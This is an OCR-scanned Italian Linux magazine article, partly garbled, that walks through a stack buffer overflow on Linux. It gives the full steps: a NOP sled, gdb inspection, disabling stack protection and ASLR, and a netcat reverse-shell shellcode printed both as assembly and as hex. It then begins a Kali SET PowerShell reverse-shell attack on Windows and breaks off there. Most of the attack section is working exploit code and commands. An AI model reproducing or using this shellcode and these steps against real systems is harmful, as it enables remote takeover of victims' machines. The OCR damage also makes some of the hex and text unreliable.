caso, avviamo il software, clicchiamo su Masterizza immagine e selezio- 
niamo l'ISO da masterizzare. Con K3b, invece, clicchiamo su Strumenti/ 
Masterizza immagine ISO e selezioniamo l'immagine ISO. 


[xe] UNetbootin 


@ Distribution [== Select Distribution == “ [== Select version 
Benvenuti in UNetbootin, il Netboot Installer universale. Uso: 
1. Selezionare dalla lista qui sopra una distribuzione ed una version 


specificare manualmente i file da caricare qui sotto. 
2. Selezionare un tipo di installazione e fare clic su OK per iniziaria. 


IT Show All Drives (Use with Care) 


Type [oriveuss 2] Orive: [imme =] _oc| 


PENDRIVE USB AVVIABILE 

Installiamo UNetbootin (http://unetbootin.sourceforge.nef). Colleghia- 
mo la pendrive USB al PC, selezioniamo Diskimage e premiamo su “..." 
per trovare l'ISO. A questo punto, clicchiamo su OK e aspettiamo che la 
procedura termini. Subito dopo avviamo il PC da periferica USB. 
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Non esiste un sistema operativo veramente sicuro e blindato. 
Ecco come il pirata riesce a prendere il controllo della tua distro preferita 
e dei PC equipaggiati con l'OS di casa Microsoft 


violare la sicurezza dei sistemi 


i informaticiè una pratica punita dalla 
B leggeitalianaedinternazionale. 


Lo è sempre stato, fin dalle sue prime versioni. Tuttavia, per 

un pirata, realizzare un malware che possa danneggiare una 
macchina GNU/Linux non è impossibile. Di sicuro, però, è ab- 
bastanza difficile. Già, perché ci sono troppe variabili in gioco: 
l'utente dovrebbe avviare il malware e, per consentirgli di ef- 
fettuare seri danni, dovrebbe garantirgli anche i permessi di 
amministrazione (sudo). Per il pirata, dunque, la vera difficoltà 
sta nel riuscire ad eseguire del codice sul sistema bersaglio: 
se ci riesce può fare molte operazioni, praticamente tutte. Può 
cancellare file, accedere alle risorse hardware del computer 


| | sistema operativo del Pinguino, si sa, è un porto sicuro. 


(uninitialized global and static variables) 


DATA segment 
(initialized giobal and static variables) 


Luca Tringali 


(ad esempio spiare dalla webcam o ascoltare l'audio catturato 
dal microfono integrato del PC). In pratica, un malware stu- 
diato per GNU/Linux ha le stesse potenzialità di un analogo 
codice malevolo sviluppato per Windows. Se sul Pinguino non 
esistono meccanismi pericolosi come l'autorun o l'installazio- 
ne automatica di programmi scaricati dal Web, esiste comun- 
que la vulnerabilità più vecchia della storia dell'informatica: il 
buffer overflow. Un pirata deve cercare un programma di uso 
comune che contenga un errore di programmazione capace di 
indurre il programma stesso ad un buffer overflow, ovvero ad 
una sovrascrittura incontrollata della memoria. Se lo trova, il 
pirata può sfruttare questa vulnerabilità per eseguire un codice 
che gli permetta di ottenere il controllo remoto e non autoriz- 
zato del PC bersaglio. E se pensiamo che in giro di software 
con problematiche del genere non ne esistano, ci sbagliamo 
di grosso: Flash Player è l'esempio più lampante. In questo 
numero di Linux Magazine abbiamo dunque deciso di puntare 
i riflettori sulla sicurezza e sui rischi ai quali siamo costante- 
mente esposti. AI pirata basta una qualsiasi 
distribuzione GNU/Linux, un po' di program- 
mazione ed un pizzico di fortuna per violare 
la sicurezza del sistema operativo del Pingui- 
no o di una qualsiasi versione di Windows. Ed 
oggi, scopriremo quali danni può arrecare ai 
due sistemi operativi da sempre antagonisti. 


LA SEGMENTAZIONE 
DELLA MEMORIA 


La memoria RAM, nell'immaginario collet- 
tivo, è un unico schedario pieno di cassetti 
ai quali è possibile accedere in modo com- 
pletamente disordinato. Non è proprio così. 
La memoria di un computer, per un program- 
ma, è divisa in cinque porzioni ben distinte: 
Text, Data, Bss, Heap e Stack. Il codice del 
programma è contenuto nel segmento di me- 
moria Text. Durante l'esecuzione del codice, 
il processore incontra un'istruzione che ri- 
chiede il lancio di una funzione. Il processore 
salta all'indirizzo della memoria Text in cui è 
presente il codice di tale funzione. Prima di 


Virtual address space of a process 


Fig. 2 - In una si- 
tuazione normale, 
lo spazio dedicato 
ad una variabile 
nello Stack contie- 
ne i byte della va- 
riabile, il byte nullo 
come terminatore 
di stringa, un pun- 
tatore del frame di 
memoria, 

e l'indirizzo di 
ritorno della fun- 
zione attuale 


Stack Growth 


iniziare le operazioni vere e proprie vi sono delle istruzioni che 
indicano al processore quali sono le variabili che devono es- 
sere condivise tra la porzione del programma che ha chiama- 
to la funzione e la funzione stessa. Queste variabili condivise 
vengono inserite nel segmento di memoria Stack. Assieme alle 
variabili vi è anche un'altra informazione che va condivisa tra il 
codice “principale” e la funzione chiamata: l'indirizzo di ritor- 
no. Ovvero, l'indirizzo di memoria in cui si trova l'istruzione da 
inserire nel registro EIP, affinché possa essere eseguita imme- 
diatamente al termine della funzione chiamata. Tuttavia, non 
c'è alcun sistema di controllo: un indirizzo di ritorno è soltanto 
un numero e niente più, e può essere sovrascritto. 


I BUFFER OVERFLOW 
BASATI SULLO STACK 


Prima di capire come sia possibile sovrascrivere l'indirizzo di ri- 
torno di una funzione per assumere il controllo di un programma, 
cerchiamo di capire meglio come funziona lo Stack. Il principio di 
funzionamento è il cosiddetto FILO, First In Last Out, cioè “/ pri- 
mo elemento ad essere inserito è l'ultimo a poter essere estratto”. 
È come una pila di piatti: il primo piatto che posizioniamo si trova 
sul fondo, e non possiamo prenderlo finché non abbiamo rimos- 
so tutti gli altri. A questo punto è necessario tenere in qualche 
modo traccia di quale sia l'ultima informazione registrata nello 
Stack, cioè l'informazione che può al momento essere estratta 
oppure dopo la quale è possibile inserire una nuova informazione. 
Ricapitoliamo la funzione dei registri dei puntatori: 

EIP: memorizza l'indirizzo di ritorno, che contiene l'istruzione 
da eseguire appena la funzione attuale sarà terminata. 

ESP: memorizza l'indirizzo dell'ultima informazione registrata nel- 
lo Stack, così è possibile sapere dove finisce lo Stack al momento 
attuale e dove scrivere l'eventuale informazione successiva. 
EBP: memorizza la posizione di un indirizzo interno allo Stack 
(dove si trovano le variabili della funzione attuale). 


LA SLITTA NOP 


Se il pirata vuole dirottare l'esecuzione dei comandi da parte 
del processore, dovrà ovviamente sovrascrivere l'indirizzo di 
ritorno di una funzione, così da poter inserire al suo posto l'in- 
dirizzo di una porzione di memoria in cui egli stesso ha scrit- 
to il codice che vuole eseguire. Naturalmente, ci sono alcuni 
problemi: il pirata ha la necessità di conoscere l'indirizzo in 
cui viene scritta la variabile “vulnerabile” e la posizione in cui 
viene scritto l'indirizzo di ritorno. Per il pirata, non esiste modo 
di ottenere le informazioni di cui ha bisogno. Tuttavia, esiste 
un trucco grazie al quale queste informazioni risultano non più 
necessarie: si chiama NOP sled. La traduzione letterale è “slit- 
ta con nessuna operazione”, ed è un'istruzione in linguaggio 
macchina che, semplicemente, non fa niente (NOP significa 
“nessuna operazione”). È molto importante capire che un'istru- 
zione NOP fa in modo che il processore passi immediatamen- 
te all'istruzione successiva. Si può quindi facilmente costruire 
una “slitta”: una lunga sequenza di istruzioni NOP non fa altro 
che portare il processore all'istruzione posizionata dopo l'ulti- 
mo NOP. Facciamo un esempio pratico: innanzitutto, ricordia- 
mo che in un sistema x86 l'istruzione NOP è rappresentata dal 
numero esadecimale \x90. L'istruzione: ; 


\x90\x90\x90\x90\x90\x90\x41\x44x44 
consiste banalmente nell'istruzione: 
\x41\x44x44 


Perché tutti i \x90 vengono saltati dal processore appena li 
legge: appena il processore incontra una di queste istruzio- 
ni, il registro EIP viene incrementato di un'unità, quindi il pro- 
cessore passa a leggere il byte immediatamente successivo. 
Non è inutile come può sembrare: può essere utilizzato per 
sincronizzare delle porzioni di memoria. Il lato più interessan- 
te della cosa è che, ovviamente, le istruzioni d'esempio sono 
perfettamente equivalenti. Ecco dunque il trucco del pirata per 
evitare di dover capire dove si trova esattamente l'indirizzo di 
memoria: basta scrivere una slitta NOP (cioè una serie di \x90) 
abbastanza lunga immediatamente prima dell'istruzione da 
eseguire. In questo modo non serve conoscere esattamente 
in quale indirizzo di memoria è stata registrata l'istruzione da — 
eseguire: basta avere una idea di massima di dove potreb- 
be trovarsi uno qualsiasi dei byte \x90, e la slitta NOP farà 
sì che il processore finisca con l'eseguire proprio l'istruzione 
che il pirata desidera. Naturalmente, il malintenzionato deve 
ancora risolvere un problema: sapere esattamente dove deve 
essere posizionato l'indirizzo di ritorno della funzione. Anche 
quest'ostacolo può essere superato con una certa facilità: ba- 
sta ripetere molte volte l'indirizzo desiderato (che va calcola- 
to in modo che si riferisca ad almeno uno dei numerosi byte 
\x90 scritti precedentemente). Infatti, per la legge probabilisti- 
ca dei “grandi numeri”, basta ripetere molte volte l'indirizzo di 
ritorno affinché almeno una di queste volte esso venga scritto 
proprio nel punto in cui deve trovarsi. Ricapitolando: è possi- 
bile sfruttare la vulnerabilità di un programma inviandogli una 


esse 
esse 
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stringa costruita con una lunga sequenza di istruzioni NOP, poi 
un codice Assembly da eseguire per ottenere il controllo del 
computer e, infine, l'indirizzo di ritorno che punta proprio su 
una delle istruzioni NOP inviate in precedenza. E cosa fare per 
creare una stringa di istruzioni NOP sufficientemente lunga? Il 
pirata si affida a Perl. Infatti, il comando: 


.+/errore “perl -e 'print "\x90"x600;'° 


produce una sequenza di 600 istruzioni NOP (\x90), ovvero 
una NOP sled di 600 byte e la passa al programma errore. 
Naturalmente, questo non basta per sfruttare davvero la vul- 
nerabilità del programma: serve anche un codice macchina 
Assembly da eseguire e l'indirizzo di ritorno. Il codice Assem- 
bly che un pirata vuole eseguire può essere qualcosa di simile 
al seguente: 


\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16 
x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e 
x30\x8d\x5e\x0£\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d 
x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\x£3\x8d\x4e 
x20\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e 
x2£\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2£\x62\x69 
x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\ 
x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x39\x23\x41\x41 
x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44 
x45\x45\x45\x45\x46\x46\x46\x46 


Per il momento non entriamo troppo nei dettagli: ci acconten- 
tiamo di dire che questo tipo di codice è chiamato shellco- 
de, perché permette al pirata di ottenere una shell, ovvero un 
prompt dei comandi con cui avere il controllo del computer 
su cui era in esecuzione il software vulnerabile. Si può quindi 
modificare il comando precedente di modo che includa sia la 
NOP sled che lo shellcode: 


./errore “perl -e 'print "\x90"x101;'°“perl -e 'print "\ 
xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\ 
x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\ 
x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\ 
ùx5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\x£3\x8d\x4e\x 
2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xf\xf\x2£f\x62\x69\x6e\ 
x2£\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2£\x62\x69\ 
x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\ 
x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x39\x23\x41\x41\ 
x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44\ 
x45\x45\x45\x45\x46\x46\x46\x46";"® 


Perché il pirata ha realizzato una NOP sled di esattamente 101 
byte (x101)? In realtà non c'è un motivo preciso per sceglie- 
re proprio questo numero, ma esiste una regola da rispettare: 
considerato che l'indirizzamento della memoria nei sistemi a 
32 bit richiede 4 byte, è ovvio che la somma dei byte della NOP 
sled e dello shellcode deve obbligatoriamente essere divisibile 
per 4, altrimenti l'indirizzo di ritorno (che verrà scritto dopo lo 
shellcode) finirebbe per essere disallineato (cioè non comince- 
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rebbe nell'esatta posizione in cui il processore si aspetterebbe 
di trovarlo). Se abbiamo contato i byte dello shellcode, avremo 
notato che sono 135. Una NOP abbastanza grande deve avere 
almeno 100 byte. Tuttavia, la somma di 100+135, ovvero 235 
byte, non è divisibile per 4. Un numero che possa essere divi- 
sibile per 4.è 236 quindi, considerato che la dimensione dello 
shellcode non può cambiare, il pirata imposta una dimensione 
della NOP sled tale da ottenere una somma totale di 236 byte. 
Manca, ormai, soltanto la parte dell'indirizzo di ritorno. 


IL GIUSTO INDIRIZZO 


L'indirizzo di ritorno che si vuole scrivere è ovviamente un indiriz- 
zo che corrisponde ad almeno uno dei caratteri della NOP sled. 
Come fa il pirata a sapere dove si trova questo codice macchina? 
Semplice: la NOP sled è ora inserita nella memoria del PC tra- 
mite la variabile “vulnerabile”, ovvero quella che nel nostro pro- 
gramma di test errore.c ( http://www.edmaster.it/url/5758"www. 
edmaster.it/url/5758) abbiamo chiamato stringa, ed alla quale 
abbiamo assegnato un massimo di 500 byte. AI pirata baste- 
rà trovare la posizione in memoria di tale stringa durante una 
esecuzione del programma errore e saprà dove trovare la NOP 
sled. Il pirata compila il programma errore.c (www.edmaster.it/ 
url/5758) assicurandosi che il compilatore non aggiunga del co- ‘ 
dice per evitare la sovrascrittura dell'indirizzo di ritorno: 


gcc errore.c -o errore -fno-stack-protector -z execstack 


Ora, il pirata procede utilizzando GNU Debugger. Avvia il pro- 
gramma con il comando: 


gdb -q ./errore 


Il pirata controlla il codice Assembly del programma errore, in par- 
ticolare quello della funzione main (il cuore di ogni programma): 


disas main 
Gli appare qualcosa del genere: 


Dump of assembler code for function main: 


0x0804841d <+0>: push $ebp 
0x080484le <+1>: mov $esp, sebp 
0x08048420 <+3>: and $Oxfffffff0, sesp 
0x08048423 <+6>: sub $0x210, %esp 
0x08048429 <+12>: mov 0xc(%ebp),t%eax 
0x0804842c <+15>: add $0x4,%eax 
0x0804842£ <+18>: mov (%eax),%eax 
0x08048431 <+20>: mov seax,0x4(%esp) 


0x08048435 <+24>: lea 

0x08048439 <+28>: mov 

0x0804843c <+31>: 

0x08048441 <+36>: mov 

0x08048446 <+41>: 

0x08048447 <+42>: ret 
End of assembler dump. 


0xlc(%esp),teax 
$eax,(%esp) 

0x80482£0 <strcpy@plt> 
$0x0,%eax 


Le operazioni preliminari 


Analizziamo quali azioni intraprende il pirata per prepararsi all'attacco 


File Modifica Visualizza Segnalibri Impostazioni Aiuto 


Il pirata deve assicurarsi che sul suo sistema siano 

installati i programmi necessari a compilare del 
codice malevolo: può farlo lanciando il comando sudo apt-get 
install nasm build-essential gcc gdb. È anche necessario 
anche il pacchetto netcat-traditional. 


sui 


File Modifica Visualizza Segnalibri Impostazioni. 


Il pirata deve ora procurarsi il programma bugga- 

to: ad esempio, può scaricare il file errore.c (www. 
edmaster.it/url/5758). |l programma deve essere compilato 
lanciando il comando gcc errore.c -o errore -fno-stack- 
protector -z execstack. 


binary: bash-Ko 


Analizzando il codice restituito dal comando disas main, c'è una 
chiamata alla funzione strcpy, all'istruzione 31. Evidentemente, 
viene dichiarata una variabile, perché prima di quest'istruzione è 
presente l'istruzione mov, che sposta delle informazioni nel regi- 
stro eax (che contiene le variabili di funzione). Qual è la dimensio- 
ne della variabile? Bisogna capire come è cambiato il puntatore 
ESP. Questa operazione viene fatta all'istruzione main+6: 


sub $0x210, %esp 


File Modifica Visualizza Segnalibri Impostazioni Aiuto 


Sui sistemi derivati da Ubuntu, potrebbe essere 

presente netcat-openbsd. Quindi, il pirata deve 
impostare come predefinita la versione tradizionale con il 
comando sudo update-alternatives -config nc, scegliendo 
l'opzione 2. 


ary: bash - Konsole IV) (O) LUI 


Aiuto 


Impostazioni 


Il comando utilizzato al passo precedente permet- 

te al pirata la compilazione senza le protezioni 
dello stack di GCC. Per disabilitare la protezione del kernel, 
il pirata lancia echo 0 + /proc/sys/kernel/randomize_va_ 
space. [non è necessario con Linux precedente al 2.6.12). 


AI registro vengono sottratti 0x210 byte, ovvero 528 byte, 
riservandoli alla variabile che verrà poi passata alla funzione 
strcpy. Significa che la dimensione effettiva della variabile 
è sicuramente inferiore a 528, perché nello spazio riserva- 
to devono essere presenti i vari byte della variabile (il pirata 
sa che sono essere 500, perché ha indicato tale dimensio- 
ne nel codice sorgente), un byte che funge da terminatore di 
stringa (cioè un carattere null) e poi alcuni byte per ottene- 
re un corretto allineamento dello Stack. L'allineamento dei 
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byte è necessario per garantire la corretta lettura delle word 
(cioè gruppi di 4 byte in un sistema a 32 bit, oppure 2 byte 
in un sistema a 16 bit). L'istruzione di ritorno della funzione è 
identificata come main+42. Per capire come si comporta il 
programma, si deve naturalmente interrompere la sua esecu- 
zione prima di tale istruzione: serve un “breakpoint” presso 
l'istruzione immediatamente precedente, ovvero l'istruzione 
leave che è identificata come main+41. Il pirata fissa quindi il 
breakpoint con il comando: 


b *main+41 
e binary : nano — Konsole 
File Modifica Visualizza Segnalibri Impostazioni Aiuto 


Il pirata apre un terminale e lancia il comando 

nano shellcode.asm. Inserisce nel file il codice 
dello shellcode: www.edmaster.it/url/5759. Poi, preme la 
combinazione di tasti Ctrl+O per salvare il file e Ctrl+X per 
chiudere l'editor di testo nano. 


File Modifica 


Visualizza Segnalibri Impostazioni Aiuto 


L*) Copia 
() Incolla Ò 
; O Cerca «\xeb\x3c\xSe}..» 


Il pirata ora ottiene la traduzione esadecimale 

del codice binario prodotto dall'assembler con il 
comando for i in $(objdump -d shellcode.o -M intel [grep 
"A" [cut -f2); do echo -n '\x'$i; done;echo. Quindi, il pirata 
seleziona e copia il codice con Ctrl+Shift+C. 


sesso 


ecee 
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Adesso, GDB metterà in pausa il programma appena arriva a 
tale istruzione, quindi un attimo prima di chiamare l'indirizzo di 
ritorno. Questa pausa offre la possibilità di vedere se l'indirizzo 
di ritorno viene sovrascritto e come. Il pirata ordina l'esecuzio- 
ne del programma con il comando: 


run “perl -e 'print "\x41"x600;'% 
il programma si è fermato al breakpoint. 


Per eseguire soltanto la prossima istruzione Assembly, sen- 
za arrivare davvero al termine del programma il pirata lancia 


a > binary : bash - Konsole È 


File Modifica Visualizza Segnalibri Impostazioni Aiuto 


A questo punto il pirata deve assemblare il codice 

Assembly: può farlo con il comando nasm -fel32 -o 
shellcode.o shellcode.asm. L'opzione indicata (-fel32) per- 
mette di ottenere un codice assemblato a 32 bit, più semplice 


di uno che lavora a 64 bit. 
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Adesso il pirata può realizzare un programma 

capace di eseguire questo codice sul sistema della 
vittima: ad esempio, con il programma testshell.c (www. 
edmaster.it/url/5760). Una volta compilato, dovrebbe offrirgli 
la connessione netcat. 


il comando s. GDB avviserà che qualcosa è andato storto 
(Single stepping until exit from function main). 
Se il pirata digita: 


otterrà questo risultato: 


esp Oxfffd2£0 0xffffd2£0 
ebp 0x41414141 0x41414141 
esi 0x0 0 


edi 0x0 0 
eip 0x41414141 0x41414141 

Si può notare che i registri del processore sono stati sovra- 
scritti. In particolare, sia il registro eip contiene il codice \x41\ 
x41\x41\x41, che è parte della stringa che avevamo fornito al 
programma tramite il comando Perl. 

EIP è molto importante perché è il registro che contiene l'indi- 
rizzo della prossima istruzione da eseguire. La stringa di 600 
byte dal valore 41 ha quindi sovrascritto l'indirizzo di ritorno 
della funzione main. 


Nei meandri dei registri del processore 


Il pirata studia il programma vulnerabile per capire come vengono scritti i registri 


(e 
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binary: nc.traditional- Konsolé 


Aiuto | 


dl e, binary :gdb - Konsole 
Segnalibri 
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Il pirata provvede prima di tutto ad aprire il suo 

server netcat, dando il comando nc.traditional 
-lvp 9999. Dovrà quindi lasciare questa finestra aperta sul 
proprio computer, ed attendere una connessione in arrivo dal 
PC della/e vittima/e. 


uu binary : gdb — Konsole 
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Il pirata imposta un breakpoit per il controllo del 

programma, prima dell'istruzione di ritorno della 
funzione buggata, con b *main+41. Poi prova a far crashare il 
programma con run ‘perl -e ‘print "\x41"x600;"°, fornendogli 
una stringa di 600 caratteri. 


Ora, il pirata deve studiare il programma vulne- 

rabile per capire quali indirizzi di memoria può 
utilizzare. Supponendo di voler utilizzare il programma 
errore precedentemente compilato, il pirata lancia il co- 
mando gdb -q./errore. 


Il programma andrà in crash, perché l'array può 

contenere solo 500 caratteri, ma il pirata impar- 
tisce i comandi s e poi i r per poter controllare i registri 
del processore poco prima del crash. Il registro EIP è stato 
riempito con 4 byte dal valore 41. 


ceco 
co 
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SCRIVERE LO SHELLCODE forward: 


A questo punto, il pirata deve cominciare a scrivere il proprio call back 
shellcode capace di funzionare tramite una connessione re- db "/bin/netcat#-e#/bin/sh#127.127.127.127#9999#AAAA 1 
mota. Il pirata scrive il codice in Assembler, quindi realizza un BBBBC CCCDDDDEEEEFFFF" 


file con un nome del tipo shellcode.asm: 
Viene quindi chiamata la sezione back, memorizzando però 


nano shellcode.asm in un'area di memoria il contenuto della stringa scritta tra 
virgolette. La stringa contiene di fatto tutte le informazioni 
Il codice comincia con un salto alla sezione forward necessarie: il programma netcat, l'opzione -e, il percorso 
della shell da lanciare, l'indirizzo IP del pirata (a cui ci si deve 
jmp short forward connettere) e la porta. Per ottenere il risultato che il pira- 
ta vuole, infatti, basterebbe che la vittima eseguisse il co- 
Tale sezione, che si trova alla fine del file, contiene le due istruzioni: mando netcat -e /bin/sh 127.127.127.127 9999. L'indirizzo 


| binary: gdb binary: gdb 
Il pirata lancia ilcomando x/600x $esp, per leg- L'indirizzo appena scoperto viene utilizzato per 
gere i 600 byte successivi al puntatore ESP. Ad un inserire la nop sled. Una buona dimensione potreb- 
certo punto, dovrebbe trovare un blocco con tutti i byte di be essere 100 byte. Però, lo shellcode è lungo 135 byte, e la 
valore 41: l'indirizzo di inizio potrebbe essere, per esempio, somma, 235, non è divisibile per 4. 236, però, lo è, quindi la 
Oxffffd510. nop sled dovrà contenere 101 byte per evitare sfasamenti. 


Il pirata può scrivere la stringa (www.edmaster.it/ AL pirata basta eseguire il programma con il 
url/5761): 101 byte del carattere NOP (90), segui- comando run seguito dalla stringa completa: 
ti dallo shellcode, e poi dall'indirizzo di ritorno scritto al ovviamente, GDB chiederà conferma al pirata, considerato 
contrario per mantenere la codifica little-endian, ripetuto che si deve riavviare il programma attualmente fermo al 
almeno un centinaio di volte. breakpoint. Il pirata digita y e procede. 
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dell'esempio è un indirizzo locale, ma ovviamente il mecca- 
nismo funziona anche con uno remoto. Sono poi presenti 
5 sequenze di 4 caratteri: queste servono al momento solo 
per riservare la memoria, che verrà poi sovrascritta con i gli 
indirizzi delle varie informazioni di cui abbiamo appena par- 
lato. Visto che si tratta di un sistema a 32 bit, ogni indirizzo 
richiede 4 byte. 


back: pop esi 
Il primo comando, pop, si occupa di spostare nel registro ESI 


l'indirizzo di memoria della variabile che è stata memorizzata 
con il comando db. 


Attentato al Pinguino! 


XOr eax, eax 


Il registro eax viene inizializzato al valore zero. Si sarebbe po- 
tuto fare anche con il comando mov eax,0, ma utilizzando xor 
non serve scrivere il simbolo 0. Questo simbolo infatti funge da 
terminatore di stringa e bloccherebbe la lettura dello shellcode 
da parte del programma vulnerabile. 

mov byte [esi + 11], al ;s terminate /bin/netcat 
Adesso, il programma sposta il contenuto della parte alta del 
registro EAX (AL è la parte alta di EAX) nell'undicesimo carat- 
tere della stringa memorizzata con il comando db. L'undicesi- 


Il pirata riesce ad invadere il PC della sua vittima, anche se è equipaggiato con GNU/Linux 


Il programma si fermerà nuovamente al brea- 

kpoint: se il pirata lancia ancora i comandiseir 
dovrebbe notare che EIP ha ora il valore ffffd510, o comun- 
que l'indirizzo di inizio della NOP sled. Può anche controllare 
con x/600x $esp. 


File 


Modifica Visualizza 


L'exploit ha funzionato: il pirata può adesso vi- 

sualizzare la finestra in cui aveva aperto il server 
netcat. Se scrive un comando in tale finestra, tale coman- 
do verrà eseguito sul sistema in cui è attivo il programma 
crackato errore. 


Segnalibri Imi 


binary: sh 


Se poi il pirata invia il comando c, l'esecuzione 

del programma continua senza fermarsi mai, ed 
il codice presente all'indirizzo di ritorno verrà eseguito: 
dovrebbe apparire un messaggio del tipo executing new 
program /bin/dash. 


| 


binary: bash 


Se la stringa funziona, il pirata può ormai utiliz- 

zarla direttamente, senza gdb, facendo eseguire 
all'utente il programma ./errore con l'intera stringa. Ad 
esempio, se il programma fosse Flash Player basterebbe 
inserire la stringa in un falso file SWF. 
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Stack Growth 


Fig. 3- Durante la situazione di overflow, l'intero spazio dedicato 
alla variabile nello Stack è riempito dai byte della variabile stessa. 
Viene sovrascritto anche il byte nullo, il puntatore del frame di 
memoria e l'indirizzo di ritorno della funzione 


mo carattere è il primo simbolo #, ed il registro EAX contiene il 
valore 0, ovvero il byte nullo con cui si può terminare la stringa. 
In poche parole, il pirata ha appena terminato la stringa inse- 
rendo il valore 0 al posto del cancelletto. Il programma proce- 
de poi a modificare l'area di memoria che inizia a ESI+44, ov- 
vero i 4 caratteri AAAA. In questa porzione di memoria viene 
memorizzato L'indirizzo del puntatore ESI originale, ovvero il 
primo carattere della stringa memorizzata con il comando db. 


lea ebx, [esi + 12] 
mov long ‘([esi + 48], ebx 


Per la stringa -e le cose sono diverse: l'indirizzo da memo- 
rizzare infatti non è più ESI, ma ESl+12. Infatti, il dodicesimo 
carattere della stringa è proprio il simbolo — della stringa -e. 
L'indirizzo di tale carattere viene calcolato con il comando lea 
e memorizzato nel registro EBX. Poi si può spostare il valore 
dell registro EBX nei 4 byte successivi al 48esimo elemento 
dello stringa originale, ovvero i byte BBBB.. 


lea ebx, [esi + 15] 
mov long [esi + 52], ebx 
lea ebx, [esi + 23] 
mov long [esi + 56], ebx 
lea ebx, [esi + 39] 
mov long [esi + 60], ebx 


Si procede allo stesso modo per memorizzare gli indirizzi delle 
altre informazioni al posto dei vari blocchi di 4 lettere. 
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mov long [esi + 64], eax 

Alla fine, al posto dei byte FFFF, viene inserito un terminatore 
di stringa copiandolo dal primo valore che avevamo inserito nel 
registro EAX, ovvero il valore 0 (che è per l'appunto un byte nul- 
lo). Così, non c'è il rischio che il processore continui a leggere. 
mov byte al, 0x0b 

Il pirata passa al registro EAX (parte alta) il byte, in valore esa- 
decimale, Ox0b. Si tratta del numero assegnato per conven- 
zione alla chiamata di sistema del kernel Linux per la funzione 
execve, che permette l'esecuzione di un comando da shell. 


mov ebx, esi 


Il puntatore ESI viene ora diretto all'indirizzo del primo valore 
del registro EBX. 


lea ecx, [esi + 44] 
lea edx, [esi + 64] 


Nel registro ECX viene inserita la sequenza di indirizzi che co- 
mincia al byte 44, ovvero dove una volta era memorizzata la pri- 
ma delle 4 A, e dove ora è memorizzato l'indirizzo del comando 
Ibin/netcat. Significa che il valore dei vari indirizzi compresi tra 
ESI+44 ed ESl+64 (ultimo byte, visto che è un byte nullo e la 
lettura si ferma lì per convenzione dei processori) è la seguente 
stringa: /bin/netcat -e /bin/sh 127.127.127.127 9999. Ovvero, 
proprio quello che il pirata voleva ottenere. Il pirata ha ottenuto 
la shell remota che voleva con netcat. Il codice può poi essere 
assemblato per sistema a 32 bit con il comando: 


nasm -felf32 -o shellcode.o shellcode.asm 


E dal risultato si può estrarre il codice eseguibile in formato 
esadecimale con il seguente comando: 


for i in $(objdump -d shellcode.o -M intel |grep "* " 
|cut -f2); do echo -n '\x'$i; done;echo 


LA SICUREZZA DI GNU/LINUX 


Il kernel offre dei meccanismi di protezione 


Affinché un tentativo di cracking come quello analizzato 

in queste pagine possa avere successo è necessario che i 
meccanismi di protezione del kernel Linux siano disattivati 
{exeecstack -s errore), rendendo dunque eseguibile il co- 
dice presente nel segmento di memoria Stack {nelle recenti 
versioni di Linux è eseguibile soltanto ilsegmento Text per 
ovvii motivi di sicurezza]. Maggiori informazioni sono dispo- 
nibili sulla pagina www.edmaster.it/url/5762 


Attacco al cuore di Windows 


Dopo il Pinguino è il turno di Windows: ecco come il pirata invade lI'0S di Microsoft 


04 - Analisi Basi Dati 
maltego 


05 - Attacchi alle Password 


06 - Attacchi Wireless sapo 


07 - Ingegneria Inversa É ET! social enti... 


08 - Strumenti di Exploiting 
u3-pwn 
09 - Sniffing e Spoofing 


10 - Mantenimento dell'Acces... 


L'ambiente desktop di Kali Linux è abbastanza sem- 

plice e intuitivo. Dopo aver cliccato sul menu Appli- 
cazioni (in alto a sinistra dell'interfaccia principale) ed essersi 
spostato nella sezione Social Engineering Tools, il pirata avvia 
il software SET (acronimo di Social Engineering Tools). 


ful landscape for deploying payloads and perfoî 
triggered by preventative technologies. 


Powershell Alphanumeric Shellcode Injector 
Powershell Reverse Shell 

Powershell Bind Shell 

Powershell Dump SAM Database 


Return to Main Menu 


>Il 


Infine; il pirata deve decidere che tipologia di 

attacco sferrare. Per essere sicuro di ottenere un 
controllo completo del computer della vittima designata, il 
pirata sceglie l'opzione 1 (Powershell Alphanumeric Shel- 
lcode Injector) e conferma con Invio. 


Alphanumeric Shellcode Injector 
Reverse Shell 

Bind Shell 

Dump SAM Database 


Main Menu 


for the payload listener (LHOST): 10.0.2.15 
Enter the port for the reverse [443] :4444% 


SET chiede al pirata di settare una porta da utilizzare 

per comunicare con il PC attaccato non appena sarà 
stabilita una connessione (ovvero, quando l'ignara vittima avrà 
aperto la finta immagine). Il pirata può settare la porta che 
preferisce (ad esempio la 4444) e confermare con Invio. 


Spear-Phishing Attack Vectors 
Website Attack Vectors 

Infectious Media Generator 

Create a Payload and Listener 

Mass Mailer Attack 

Arduino-Based Attack Vector 
Wireless Access Point Attack Vector 
QRCode Generator Attack Vector 
Powershell Attack Vectors 

Third Party Modules 


E 
* 
3 
4 
5 
6 
7 
8 
9 


1 


li - — —_ C_ cc LT 


Nella finestra che appare a schermo, il pirata preme 

Invio e, successivamente 1, seguito da Invio, per 
selezionare l'opzione Social Engineering Attacks. Si ritrova di 
fronte ad un altro menu nel quale effettuare una scelta: preme 
